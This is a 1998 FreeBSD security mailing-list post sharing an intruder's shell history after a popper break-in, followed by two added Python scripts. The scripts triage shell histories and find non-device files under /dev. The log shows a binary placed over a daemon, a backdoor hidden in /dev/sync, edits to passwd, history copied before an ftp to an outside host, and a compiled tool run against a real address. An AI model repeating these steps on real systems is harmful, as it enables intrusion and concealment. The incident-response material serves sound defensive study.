Date: Thu, 27 Aug 1998 01:38:37 -0400 (EDT)
From: Wilson MacGyver <macgyver@cylatech.com>
To: security@FreeBSD.ORG
Subject: post breakin log
Message-ID: <199808270538.BAA01341@armitage.cylatech.com>
Hi guys,

My FreeBSD box got hacked about two days ago... yes yes, via the popper. I reinstalled the system, but saved the log. I was looking through it to see what he has done. There is some stuff you may find interesting... the log from history follows.

From the log, it seems he is very knowledgeable about FreeBSD, though I must admit I don't get why he makes the /dev/sync. Also, I don't know what the deal is with the bnc* stuff. He installed a backdoor on my system, and then attacked a bunch of systems while he was on. He even has a FreeBSD rootkit. :)

Any suggestion to prevent further break-ins is appreciated, other than "not to run popper" anymore. (grin)

Has anyone seen some of these programs he ran/installed/compiled before?

Thanks,
Mac

----------------------
cd /tmp
telnet localhost 110
ls -la
mv popper /usr/local/libexec/
telnet localhost 110
rm -rf free*
cd /games
ls -la
cd /dev
mkdir sync
cd sync
ftp worldnetworks.net
tar -xvf b.tar
rm -rf b.tar
cd bnc*
make
pico bnc.conf
mv bnc ..
cd ..
rm -rf bnc2*
vi bnc.conf
mv bnc pine
pine
exit
ls
cd /usr
ld
ls
cd ..
ls
cd root
ls -la
cd ..
locate bnc
locate irc
ls
locate tcp.log
cd /dev
ls
tail ptyr
tail ptyr1
tail ptyp1
tail ptyq1
uname -a
exit
ls
cd etc
pico passwd
tail passwd
cd usr
cd /usr
ls
cd sup
ls
ls -la
cd src-all
ls
locate fbsdrootkit.tgz
locate fb.tgz
locate bnc.conf
cd ..
cd local
ls
cd ..
ls
cd /dev
ls -la
tail zero
tail /root/.bash_history
cd /root
cp .bash_history h
ftp bugs.mc.duke.edu
rm h
cd /dev
cd sync
ls
tail bnc.conf
exit
cd /usr/games
ls
cd hack
cd hide
ls
ls -la
./hack
ls
cd /dev/sync
ls
ls -la
cd ..
tail ptya
locate irc
irc
BitchX
cd sync
ls
tail bnc.conf
telnet linuxppc.org
telnet irc.686.org
telnet irc686.com
telnet irc.686.com
who
telnet onyx.eng.sunysb.edu
telnet irc.686.com 90210
telnet declan.bio.columbia.edu
telnet sleepy.uncg.edu
telnet sleepy.uncg.edu
telnet desoto.coosavalley.net
telnet 209.16.220.8
telnet ramsis.spd.louisville.edu
telnet nuptse.knowledge2000.com
telnet ramses.spd.louisville.edu
telnet cc607580-a.hwrd1.md.home.com
pico
tail /root/.bash_history
ls
uptime
cd root
ls
tail .rhosts
tail /etc/hosts.equiv
cd /var/named
cd var
ls
cd /var
ls
telnet STARLIGHT1.DIGITALSTARLIGHT.COM
uname -a
telnet www.cylatech.com
rlogin -l ui8765 www.cylatech.com
ls
uname -a
ftp bugs.mc.duke.edu
gcc
gcc -o bmb bmb.c
ls
./bmb 207.153.39.89 23
ls
rm bmb*
ls
exit
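The history above is the artifact you triage after a compromise like this one. The script below is an added example, not part of the original mail and not a FreeBSD tool: it walks a shell history while tracking the working directory (the attacker did most of his work with relative paths from /dev/sync) and flags the patterns visible in the posted log: anything written under /dev, a binary moved into a system libexec or bin directory, bnc/BitchX/rootkit file names, reads or edits of passwd, .rhosts, hosts.equiv and .bash_history, outbound fan-out to many hosts, and a freshly compiled tool run against a host:port. SAMPLE_HISTORY is constructed from the posted log with the victim host names and IP replaced by example.net names and an RFC 5737 address; the suspect-name list, the fan-out threshold and the starting directory /root are assumptions to tune.

```python
"""Triage a recovered shell history for post-intrusion indicators.

Added example, not part of the original mail and not a FreeBSD tool.
SAMPLE_HISTORY is constructed from the posted log with hosts replaced;
cwd tracking assumes the shell started in /root (an assumption).
"""
import posixpath
from collections import Counter

SYSTEM_BIN_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/libexec",
                   "/usr/local/bin", "/usr/local/sbin", "/usr/local/libexec")
AUTH_FILES = {"passwd", "master.passwd", ".rhosts", "hosts.equiv"}
HISTORY_FILES = {".bash_history", ".history", ".sh_history"}
SUSPECT_NAMES = ("bnc", "bitchx", "rootkit")   # names seen in the posted log; tune
WRITE_VERBS = {"mkdir", "mv", "cp", "tar", "make", "gcc", "pico", "vi"}
REMOTE_VERBS = {"telnet", "rlogin", "ftp", "ssh", "rsh"}
LOCAL_HOSTS = {"localhost", "127.0.0.1"}
FANOUT_THRESHOLD = 5                            # assumption; tune per site

# Constructed sample, trimmed from the posted log, hosts replaced.
SAMPLE_HISTORY = """
cd /tmp
telnet localhost 110
mv popper /usr/local/libexec/
cd /dev
mkdir sync
cd sync
ftp files.example.net
tar -xvf b.tar
cd bnc2
make
mv bnc ..
cd ..
mv bnc pine
cd /etc
pico passwd
cd /root
tail .rhosts
cp .bash_history h
ftp drop.example.net
rm h
telnet irc1.example.net
telnet irc2.example.net
telnet host3.example.net
telnet host4.example.net
rlogin -l user5 host5.example.net
gcc -o bmb bmb.c
./bmb 192.0.2.10 23
rm bmb*
""".strip().splitlines()


def resolve(cwd, target, home="/root"):
    """Resolve a path argument against the tracked cwd, as the shell would."""
    if not target:
        return home
    if not target.startswith("/"):
        target = posixpath.join(cwd, target)
    return posixpath.normpath(target)


def under(path, root):
    """True if path is root or lies beneath it."""
    return path == root or path.startswith(root.rstrip("/") + "/")


def remote_target(args):
    """First host-like argument, skipping '-l user' style options."""
    it = iter(args)
    for a in it:
        if a == "-l":
            next(it, None)
        elif not a.startswith("-"):
            return a
    return None


def triage(history, home="/root"):
    """Return [(line_no, category, detail)] findings for a list of history lines."""
    cwd, findings, hosts, compiled = home, [], set(), {}
    for n, raw in enumerate(history, 1):
        parts = raw.split()
        if not parts:
            continue
        verb, args = parts[0], parts[1:]
        if verb == "cd":                       # only used to track cwd
            cwd = resolve(cwd, args[0] if args else "", home)
            continue
        operands = [a for a in args if not a.startswith("-")]
        paths = [resolve(cwd, a, home) for a in operands]

        def hit(category):
            findings.append((n, category, raw.strip()))

        # /dev holds device nodes; building or unpacking there is a hiding spot.
        if verb in WRITE_VERBS and (under(cwd, "/dev") or any(under(p, "/dev") for p in paths)):
            hit("write under /dev")
        # A binary dropped over a daemon (the replaced popper) in a system dir.
        if verb == "mv" and paths and any(under(paths[-1], d) for d in SYSTEM_BIN_DIRS):
            hit("binary placed in system dir")
        if any(posixpath.basename(p) in AUTH_FILES for p in paths):
            hit("auth file touched")
        if any(posixpath.basename(p) in HISTORY_FILES for p in paths):
            hit("shell history accessed")
        if any(s in a.lower() for a in operands for s in SUSPECT_NAMES):
            hit("known tool name")
        if verb in REMOTE_VERBS:
            host = remote_target(args)
            if host and host not in LOCAL_HOSTS:
                hosts.add(host)
        if verb == "gcc" and "-o" in args and args.index("-o") + 1 < len(args):
            compiled[args[args.index("-o") + 1]] = n
        if verb.startswith("./") and verb[2:] in compiled and args:
            hit("compiled tool run")            # e.g. ./bmb <ip> <port>
    if len(hosts) >= FANOUT_THRESHOLD:
        findings.append((None, "outbound fan-out", "%d hosts: %s" % (len(hosts), ", ".join(sorted(hosts)))))
    return findings


def summarize(findings):
    """Count findings per category."""
    return Counter(category for _, category, _ in findings)


if __name__ == "__main__":
    for line_no, category, detail in triage(SAMPLE_HISTORY):
        print("%-4s %-28s %s" % (line_no or "-", category, detail))
```

Run it against a copy of the real history (one command per line) to get a prioritized list; the cwd tracking is deliberately approximate (no globbing, no pushd), so treat an unflagged line as unreviewed, not as clean.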
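The /dev/sync trick works because a pre-devfs /dev on FreeBSD of that era is an ordinary directory populated by MAKEDEV, so a subdirectory full of regular files sits unnoticed among hundreds of device nodes. The check below is an added example (not from the original mail and not a FreeBSD tool): it lists everything under a /dev-style directory that is a regular file or a real subdirectory rather than a device node, fifo, socket or symlink. ALLOWED_SUBDIRS is an assumption to tune per system; demo_tree() builds a constructed stand-in for /dev so the check runs without root.

```python
"""List non-device entries under a static /dev.

Added example, not part of the original mail. ALLOWED_SUBDIRS is an
assumption; demo_tree() builds a constructed directory standing in for /dev.
"""
import os
import stat
import tempfile

ALLOWED_SUBDIRS = {"fd"}   # /dev/fd is a legitimate directory on many systems


def foreign_entries(devdir):
    """Relative paths under devdir that are regular files or real directories."""
    found = []
    for dirpath, dirnames, filenames in os.walk(devdir):
        rel_dir = os.path.relpath(dirpath, devdir)
        if dirpath == devdir:                  # prune expected top-level dirs only
            dirnames[:] = [d for d in dirnames if d not in ALLOWED_SUBDIRS]
        for d in dirnames:
            if not os.path.islink(os.path.join(dirpath, d)):
                found.append(os.path.normpath(os.path.join(rel_dir, d)))
        for f in filenames:
            # lstat: device nodes, fifos, sockets and symlinks are all non-regular
            if stat.S_ISREG(os.lstat(os.path.join(dirpath, f)).st_mode):
                found.append(os.path.normpath(os.path.join(rel_dir, f)))
    return sorted(found)


def demo_tree():
    """Constructed stand-in for /dev: an allowed fd/, a fifo, and a hidden sync/."""
    root = tempfile.mkdtemp(prefix="fakedev-")
    os.mkdir(os.path.join(root, "fd"))
    os.mkfifo(os.path.join(root, "log"))
    os.mkdir(os.path.join(root, "sync"))
    open(os.path.join(root, "sync", "bnc.conf"), "w").close()
    return root


if __name__ == "__main__":
    for entry in foreign_entries(demo_tree()):
        print(entry)
```

On a real host run foreign_entries("/dev") as root and compare against MAKEDEV's expected layout; anything else under /dev is either an admin's leftover or an intruder's working directory.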